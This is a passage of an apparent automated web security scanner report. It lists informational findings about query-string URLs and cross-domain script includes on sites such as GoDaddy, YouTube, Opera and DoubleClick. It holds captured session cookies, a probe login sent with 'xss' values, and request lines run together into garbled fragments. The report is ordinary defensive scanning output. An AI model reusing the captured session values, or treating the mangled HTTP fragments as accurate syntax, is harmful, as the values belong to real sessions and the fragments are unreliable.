HTTP/1.1 200 OK.port25.com/xmlrpc.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtm...[SNIP]... <link rel="stylesheet" type="text/css" href="http://powermta1.com/wp-content/plugins/cforms/styling/sidebar-layout.css" /> <script type="text/javascript" src="http://powermta1.com/wp-content/plugins/cforms/js/cforms.js"> </script>...[SNIP]... <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <a href="http://www.linkedin.com/groups?about=&gid=1886901&trk=anet_ug_grppro" title="linkedin" target="_blank"> <img src="/wp-content/themes/powermta1/images/in-logo.gif" align="left" /></a><a href="http://www.twitter.com/tabsharani" title="twitter" target="_blank"> <img src="/wp-content/themes/powermta1/images/twit-logo.gif" align="left" />...[SNIP]... <a href="http://www.facebook.com/pages/Port25-Solutions-Inc/40433056905" title="facebook" target="_blank"> <img src="/wp-content/themes/powermta1/images/face-logo.gif" align="left" />...[SNIP]... <a href="http://twitter.com/Port25Solutions" class="twitter-follow-button" data-show-count="true" data-button="grey" data-link-color="ffffff"> Follow @Port25Solutions</a><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script><a href="http://twitter.com/tabsharani" class="twitter-follow-button" data-show-count="true" data-button="grey" data-link-color="ffffff"> Follow @tabsharani</a><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script><a href="http://twitter.com/fletchster" class="twitter-follow-button" data-show-count="true" data-button="grey" data-link-color="ffffff"> Follow @Pfletchster</a><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>...[SNIP]... <a href="http://www.the-dma.org" target="_blank"> DMA</a><br /><a href="http://www.emailexperience.org" target="_blank"> EEC</a><br /><a href="http://www.espcoalition.org" target="_blank"> ESPC</a><br /><a href="http://www.maawg.org" target="_blank"> MAAWG</a>...[SNIP]...
15.77. http://www.smtp.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.smtp.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:http://www.smtp.com/?gclid=CJWNm_2JoqsCFSg1gwodCS0_kQ http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://twitter.com/smtpcom http://www.linkedin.com/companies/446200
Request
GET /?gclid=CJWNm_2JoqsCFSg1gwodCS0_kQ HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKadd3a4b2c60da"=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... /main.css?1268498319" media="screen" rel="stylesheet" type="text/css" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... <a href="http://twitter.com/smtpcom"> Follow Us On Twitter</a>...[SNIP]... <a href="http://twitter.com/smtpcom"> <img src="/images/default/twitter_icon.gif" alt="" />...[SNIP]... <a href="http://www.linkedin.com/companies/446200 "> Connect With Us on Linkedin</a>...[SNIP]... <a href="http://www.linkedin.com/companies/446200 "> <img src="/images/default/linkedin_icon.gif" alt="" />...[SNIP]...
15.78. http://www.smtp2go.net/index.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.smtp2go.net
Path:
/index.php
Issue detail
The page was loaded from a URL containing a query string:http://www.smtp2go.net/index.php?option=com_content&view=article&id=2&Itemid=2 http://bromius.smtp2go.hop.clickbank.net/?c=Su http://www.visisearch.com/
Request
GET /index.php?option=com_content&view=article&id=2&Itemid=2 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3fb48a03540f7=1unace1l1crhkih9j89hh6j324; __utma=13849269.1804599949.1316207669.1316207669.1316207669.1; __utmb=13849269.1.10.1316207669; __utmc=13849269; __utmz=13849269.1316207669.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smtp%20server
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" xml:lang="en-gb" lang="en-gb" >...[SNIP]... <a href="http://bromius.smtp2go.hop.clickbank.net?c=Su" target="_self" title="smtp2go - free trial!"> start your 7 day free trial now</a>...[SNIP]... <a href="http://bromius.smtp2go.hop.clickbank.net?c=Su" target="_self" title="smtp2go - free trial!"> <img src="/images/stories/smtp2go free trial.jpg" border="0" alt="smtp2go - free trial!" title="smtp2go - free trial!" align="right" />...[SNIP]... <a href="http://www.visisearch.com/" target="_blank"> SEO Strategies</a>...[SNIP]...
15.79. http://www.socketlabs.com/lpages/od-smtp-service
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.socketlabs.com
Path:
/lpages/od-smtp-service
Issue detail
The page was loaded from a URL containing a query string:http://www.socketlabs.com/lpages/od-smtp-service?ctt_id=3448125&ctt_adnw=Google&ctt_kw=SMTP%20server&ctt_ch=ps&ctt_entity=tc&ctt_adid=7890931031&ctt_nwtype=search&ctt_cli=8x11767x88739x778008&gclid=CJKar_KJoqsCFRpggwodHTRzEg http://static.woopra.com/js/woopra.v2.js
Request
GET /lpages/od-smtp-service?ctt_id=3448125&ctt_adnw=Google&ctt_kw=SMTP%20server&ctt_ch=ps&ctt_entity=tc&ctt_adid=7890931031&ctt_nwtype=search&ctt_cli=8x11767x88739x778008&gclid=CJKar_KJoqsCFRpggwodHTRzEg HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK420f4303ae360"/html4/loose.dtd">...[SNIP]... <script type="text/javascript" src="//static.woopra.com/js/woopra.v2.js"> </script>...[SNIP]...
15.80. http://www.stumbleupon.com/badge/embed/1/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.stumbleupon.com
Path:
/badge/embed/1/
Issue detail
The page was loaded from a URL containing a query string:http://www.stumbleupon.com/badge/embed/1/?url=http://thehackernews.com/2011/09/godaddy-websites-compromised-with.html http://cdn.stumble-upon.com/css/badges_su.css?v=20110909-00 http://cdn.stumble-upon.com/js/badge_su.js?v=20110909-00
Request
GET /badge/embed/1/?url=http://thehackernews.com/2011/09/godaddy-websites-compromised-with.html HTTP/1.1/2011/09/godaddy-websites-compromised-with.html/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www...[SNIP]... <link rel="stylesheet" href="http://cdn.stumble-upon.com/css/badges_su.css?v=20110909-00" type="text/css" media="screen, projection" /> <script type="text/javascript" src="http://cdn.stumble-upon.com/js/badge_su.js?v=20110909-00"> </script>...[SNIP]...
15.81. http://www.ubm.com/en/site-services/search/search-result.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ubm.com
Path:
/en/site-services/search/search-result.aspx
Issue detail
The page was loaded from a URL containing a query string:http://www.ubm.com/en/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll&query=help%20contact http://ubmtech.112.2o7.net/b/ss/ubmubmcom/1/H.22.1%20-%20-NS/0?w=1&h=1&as=1 https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js
Request
GET /en/site-services/search/search-result.aspx?ResultPage=1&Domain=MergeAll&query=help%20contact HTTP/1.1/people/ubm-people.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3{FE5D7FDF-89C0-4D99-9AA3-B5FBD009C9F3}; ASP.NET_SessionId=lrutmeuvvoi00fjnhwegnc3x; SERVERID=GS2-WEB01; __utma=101304133.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.3.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); www-ubm-com#lang=en
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" >...[SNIP]... <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js " language="javascript"> </script>...[SNIP]... <script language="JavaScript" type="text/javascript" src="https://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js"> </script>...[SNIP]... <img src="http://ubmtech.112.2o7.net/b/ss/ubmubmcom/1/H.22.1 - -NS/0?w=1&h=1&as=1" height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]...
15.82. http://www.youtube.com/embed/lIEF1xCAvxo
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.youtube.com
Path:
/embed/lIEF1xCAvxo
Issue detail
The page was loaded from a URL containing a query string:http://www.youtube.com/embed/lIEF1xCAvxo?rel=0 http://s.ytimg.com/yt/cssbin/www-embed-vfl6DvbkH.css http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif http://s.ytimg.com/yt/jsbin/www-embed_core_module-vfls7Qr1c.js http://www.google.com/support/youtube/bin/answer.py?answer=1229982
Request
GET /embed/lIEF1xCAvxo?rel=0 HTTP/1.1/default.asp/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3_pXTnp7lsc; PREF=fv=10.3.183
Response
HTTP/1.1 200 OK<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vfl6DvbkH.css"> ...[SNIP]... -placeholder"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" height="60" width="300"> </div>...[SNIP]... <a href="http://www.google.com/support/youtube/bin/answer.py?answer=1229982"> help setting up HTML5 3D</a>...[SNIP]... <img class="html5-watermark html5-stop-propagation html5-icon hid" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="watermark"> -chrome html5-stop-propagation">...[SNIP]... <img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>...[SNIP]... -button yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="-1" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>...[SNIP]... -button html5-control-right yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="11" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>...[SNIP]... -button html5-control-right hid yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="10" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>...[SNIP]... <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">...[SNIP]... <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">...[SNIP]... -button html5-control-right hid yt-uix-button yt-uix-button-player yt-uix-tooltip yt-uix-button-empty" tabindex="7" role="button"><img class="yt-uix-button-icon yt-uix-button-icon-html5" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> </button>...[SNIP]... <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">...[SNIP]... <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <div class="yt-uix-button-menu yt-uix-button-menu-player" style="display: none;">...[SNIP]... <script src="//s.ytimg.com/yt/jsbin/www-embed_core_module-vfls7Qr1c.js"> </script>...[SNIP]...
16. Cross-domain script include
previous
next
There are 95 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
16.1. http://fei-zyfer.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://fei-zyfer.com
Path:
/
Issue detail
The response dynamically includes the following script from another domain:http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Request
GET / HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OKbanipal/2.0 (XO(R) Web Site Hosting)...[SNIP]... <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"> </script>...[SNIP]...
16.2. http://go.icontact.com/SEM/AP/free-30-day-trial-20J6-1725H4.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://go.icontact.com
Path:
/SEM/AP/free-30-day-trial-20J6-1725H4.html
Issue detail
The response dynamically includes the following script from another domain:http://player.ooyala.com/player.js?width=388&height=290&embedCode=BxcnZkMjpvja5pkM5Te_e_rArpHwljfi
Request
GET /SEM/AP/free-30-day-trial-20J6-1725H4.html HTTP/1.1/SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=1ehsmpmkcgj5x3opjna0dmeh; _mkto_trk=id:720-FDE-591&token:_mch-icontact.com-1316204855532-39757; LiveBall=uid=1170743&uky=LBG7YTE7&rid=1286578
Response
HTTP/1.1 200 OK=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" lang="en">...[SNIP]... <script src="http://player.ooyala.com/player.js?width=388&height=290&embedCode=BxcnZkMjpvja5pkM5Te_e_rArpHwljfi"> </script>...[SNIP]...
16.3. http://googleads.g.doubleclick.net/pagead/ads
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://googleads.g.doubleclick.net
Path:
/pagead/ads
Issue detail
The response dynamically includes the following script from another domain:http://pagead2.googlesyndication.com/pagead/sma8.js
Request
GET /pagead/ads?client=ca-pub-5747035432214533&output=html&h=90&slotname=3706610610&w=728&lmt=1316207685&flash=10.3.183&url=http%3A%2F%2Fwww.bookkeepers.com.au%2F&dt=1316207735903&bpp=17&shv=r20110907&jsv=r20110914&correlator=1316207740186&frm=4&adk=1292839352&ga_vid=2016915880.1316207740&ga_sid=1316207740&ga_hid=167560056&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1131&bih=870&eid=44901218%2C36887101&ref=http%3A%2F%2Fwww.visisearch.com%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=4464&xpc=xZLYf81nzv&p=http%3A//www.bookkeepers.com.au HTTP/1.1.net/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var...[SNIP]... <script src="http://pagead2.googlesyndication.com/pagead/sma8.js"> </script>...[SNIP]...
16.4. http://googleads.g.doubleclick.net/pagead/ads
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://googleads.g.doubleclick.net
Path:
/pagead/ads
Issue detail
The response dynamically includes the following script from another domain:http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js
Request
GET /pagead/ads?client=ca-pub-3796773913386149&output=html&h=250&slotname=1161958565&w=300&lmt=1316226009&flash=10.3.183&url=http%3A%2F%2Fportal.opera.com%2F&dt=1316208008700&bpp=201&shv=r20110907&jsv=r20110914&correlator=1316208009033&frm=4&adk=265923585&ga_vid=1095286181.1316208009&ga_sid=1316208009&ga_hid=212708364&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1131&bih=870&eid=36887101&ref=http%3A%2F%2Fwww.opera.com%2Fcompany%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=423&xpc=B211ORtJZa&p=http%3A//portal.opera.com HTTP/1.1.net/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"/jsc/d3/ff2.html?n=1133;c=173;s=24;d=9;w=300;h=250;l=http://adclick.g.doubleclick....[SNIP]... <script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"> </script>...[SNIP]...
16.5. https://idp.godaddy.com/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/login.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1 https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
Request
POST /login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; currency1=potableSourceStr=USD; adc1=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic==false&pass_focus=false&loginname=xss&password=xss&Login.x=30&Login.y=20
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:00 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml"><script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"> </script>...[SNIP]... .securepaynet.net/sso/gd/imgs/favicon.ico" /><script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <script src="https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1" type="text/javascript"> </script>...[SNIP]...
16.6. https://idp.godaddy.com/retrieveaccount.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/retrieveaccount.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1 https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
Request
GET /retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB181&target=http%3A%2F%2Fwww.godaddy.com%2F/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:11 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml"><script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"> </script>...[SNIP]... .securepaynet.net/sso/gd/imgs/favicon.ico" /><script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <script src="https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1" type="text/javascript"> </script>...[SNIP]...
16.7. https://idp.godaddy.com/shopper_new.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://idp.godaddy.com
Path:
/shopper_new.aspx
Issue detail
The response dynamically includes the following scripts from other domains:https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1 https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
Request
GET /shopper_new.aspx?ci=10530&spkey=GDSWNET-M1PWCORPWEB181 HTTP/1.1/retrieveaccount.aspx?ci=9107&spkey=GDSWNET-M1PWCORPWEB181/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3laypopin=false; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc; flag1=cflag=us; preferences1=_sid=uddglhvacbaaxcsewbpfbfkhsgjjfjxe&gdshop_currencyType=USD&dataCenterCode=US; SplitValue1=95; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=b60669da-2123-4bfc-afe4-9bcdeba931e5; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ASP.NET_SessionId=fubx1k3jh1q5dtrpmjpdfb45; currency1=potableSourceStr=USD; adc1=US; traffic=
Response
HTTP/1.1 200 OKrceStr=USD; domain=godaddy.com; expires=Sun, 16-Sep-2012 18:06:18 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... <script src="https://img3.wsimg.com/AtlantisScripts/jquery/jquery-1.3.1.min.js" type="text/javascript"> </script>...[SNIP]... .securepaynet.net/sso/gd/imgs/favicon.ico" /><script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js"> </script>...[SNIP]... <script src="https://img3.wsimg.com/idp/script/Fastball_Lib.js?version=1" type="text/javascript"> </script>...[SNIP]...
16.8. http://labs.opera.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://labs.opera.com
Path:
/
Issue detail
The response dynamically includes the following script from another domain:http://www.google-analytics.com/urchin.js
Request
GET / HTTP/1.1/company//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" lang="en...[SNIP]... <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>...[SNIP]...
16.9. http://labs.opera.com/news/2011/03/22/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://labs.opera.com
Path:
/news/2011/03/22/
Issue detail
The response dynamically includes the following script from another domain:http://www.google-analytics.com/urchin.js
Request
GET /news/2011/03/22/ HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; __utma=228300800.160415536.1316208006.1316208006.1316208006.1; __utmb=228300800; __utmc=228300800; __utmz=228300800.1316208006.1.1.utmccn=(referral)|utmcsr=opera.com|utmcct=/company/|utmcmd=referral
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" lang="en...[SNIP]... <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>...[SNIP]...
16.10. http://landing.sendgrid.com/smtp-with-bullet-points/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://landing.sendgrid.com
Path:
/smtp-with-bullet-points/
Issue detail
The response dynamically includes the following scripts from other domains:http://d2f7h8c8hc0u7y.cloudfront.net/performable/pax/0a6gTR.js http://munchkin.marketo.net/munchkin.js
Request
GET /smtp-with-bullet-points/?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK6ecdddc8dd049573f00e4".performable.us.performable.com/catalog/2537.0/assets/images/HpeUB-sendgrid_logo.jpg" height="359" width="93" />...[SNIP]... <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"> </script>...[SNIP]... <script src="//d2f7h8c8hc0u7y.cloudfront.net/performable/pax/0a6gTR.js"> </script>...[SNIP]...
16.11. http://media.ubm.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://media.ubm.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js
Request
GET / HTTP/1.1/people/jobshop.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.6.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... <script language="JavaScript" type="text/javascript" src="http://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js"> </script>...[SNIP]...
16.12. http://media.ubm.com/news
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://media.ubm.com
Path:
/news
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js http://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js
Request
GET /news HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.2104120162.1316209479.1316209479.1316209479.1; __utmb=101304133.6.10.1316209479; __utmc=101304133; __utmz=101304133.1316209479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=timm988to1bk4j35fe2lc91p90; s_cc=true; __utma=20806436.44174265.1316209563.1316209563.1316209563.1; __utmb=20806436.1.10.1316209563; __utmc=20806436; __utmz=20806436.1316209563.1.1.utmcsr=ubm.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/people/jobshop.aspx; s_nr=1316209567014; s_lv=1316209567014; s_lv_s=First%20Visit; us_ubm_aut=8-2; s_sq=cmpglobalvista%3D%2526pid%253DUBM%252520-%252520MediaRoom%2526pidt%253D1%2526oid%253Dhttp%25253A//media.ubm.com/news%2526ot%253DA
Response
HTTP/1.1 200 OK/index.php/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"> </script>...[SNIP]... <script language="JavaScript" type="text/javascript" src="http://i.ubm-us.net/shared/omniture/ubm_h_s_code_remote.js"> </script>...[SNIP]...
16.13. http://my.opera.com/community/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://my.opera.com
Path:
/community/
Issue detail
The response dynamically includes the following script from another domain:http://static.myopera.com/community/js/cookies-min.js
Request
GET /community/ HTTP/1.1/company//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/
Response
